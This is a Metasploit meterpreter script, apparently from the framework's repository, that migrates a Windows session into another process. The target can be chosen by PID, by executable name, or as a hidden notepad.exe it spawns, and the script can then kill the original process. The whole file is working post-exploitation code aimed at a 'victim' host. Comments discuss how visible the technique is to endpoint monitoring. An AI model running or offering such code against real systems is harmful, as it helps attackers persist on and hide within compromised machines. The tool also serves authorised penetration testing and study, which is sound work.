
migrate.rb 2.3KB

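##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#
# Usage: run migrate [-f] [-k] [-p <pid>] [-n <name>]
#   -f  spawn a hidden notepad.exe and migrate into it (takes precedence over -p/-n)
#   -p  migrate into an explicit PID
#   -n  migrate into the first process whose executable name matches
#   -k  kill the original server process after migrating
#
spawn = false          # -f: spawn a fresh notepad.exe as the target
kill = false           # -k: terminate the original process afterwards
target_pid = nil       # -p / -n / -f all resolve into this
target_name = nil      # -n: executable name to look up
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-f" => [ false, "Launch a process and migrate into the new process"],
  "-p" => [ true , "PID to migrate to."],
  "-k" => [ false, "Kill original process."],
  "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
)
opts.parse(args) { |opt, _idx, val|
  case opt
  when "-f"
    spawn = true
  when "-k"
    kill = true
  when "-p"
    # `to_i` would silently turn a non-numeric argument into PID 0 and the
    # script would then try to migrate into that; reject anything that is
    # not a plain decimal number up front.
    unless val.to_s =~ /\A\d+\z/
      print_error("Invalid PID for -p: #{val}")
      print_line(opts.usage)
      raise Rex::Script::Completed
    end
    target_pid = val.to_i
  when "-n"
    target_name = val.to_s
  else
    # -h and any unrecognised switch both print usage and stop the script.
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}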
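# Spawns a hidden notepad.exe on the target and returns its PID so the
# session can migrate into it. The bare executable name is resolved via the
# target's PATH, so this assumes notepad.exe is reachable there.
#
# NOTE(review): a windowless notepad.exe started by the session is a
# well-known migration artifact; expect it to stand out to endpoint monitoring.
def create_temp_proc
  cmd = "notepad.exe"
  # Hidden so no window appears on the victim's desktop.
  spawned = client.sys.process.execute(cmd, nil, { 'Hidden' => true })
  spawned.pid
end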
# With no arguments at all there is nothing to do: show usage and stop.
if args.empty?
  print_line(opts.usage)
  raise Rex::Script::Completed
end
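### Main ###
# Migration as done here only applies to Windows Meterpreter sessions.
if client.platform == 'windows'
  server = client.sys.process.open
  original_pid = server.pid
  print_status("Current server process: #{server.name} (#{server.pid})")

  # -f takes precedence over -p/-n: spawn a fresh target and use its PID.
  if spawn
    print_status("Spawning notepad.exe process to migrate to")
    target_pid = create_temp_proc
  end

  # -n resolves to the PID of the first process with that executable name;
  # an explicit -p (or -f) wins if both were given.
  if target_name && !target_pid
    target_pid = client.sys.process[target_name]
    unless target_pid
      print_status("Could not identify the process ID for #{target_name}")
      raise Rex::Script::Completed
    end
  end

  # Nothing to migrate into (e.g. only -k was passed): stop here rather than
  # calling migrate with nil.
  unless target_pid
    print_error("No target process specified; use -f, -p or -n")
    print_line(opts.usage)
    raise Rex::Script::Completed
  end

  migrated = false
  begin
    print_good("Migrating to #{target_pid}")
    client.core.migrate(target_pid)
    migrated = true
    print_good("Successfully migrated to process #{target_pid}")
  rescue ::StandardError => e
    # StandardError rather than ::Exception so Interrupt/SystemExit are not
    # swallowed; a failed migration is reported and handled below.
    print_error("Could not migrate in to process.")
    print_error(e)
  end

  # Only kill the original process once we are no longer running inside it.
  # After a failed migration original_pid is still our own process, and
  # killing it would tear down the session.
  if kill && migrated
    print_status("Killing original process with PID #{original_pid}")
    client.sys.process.kill(original_pid)
    print_good("Successfully killed process with PID #{original_pid}")
  elsif kill
    print_error("Not killing PID #{original_pid}: migration did not succeed")
  end
end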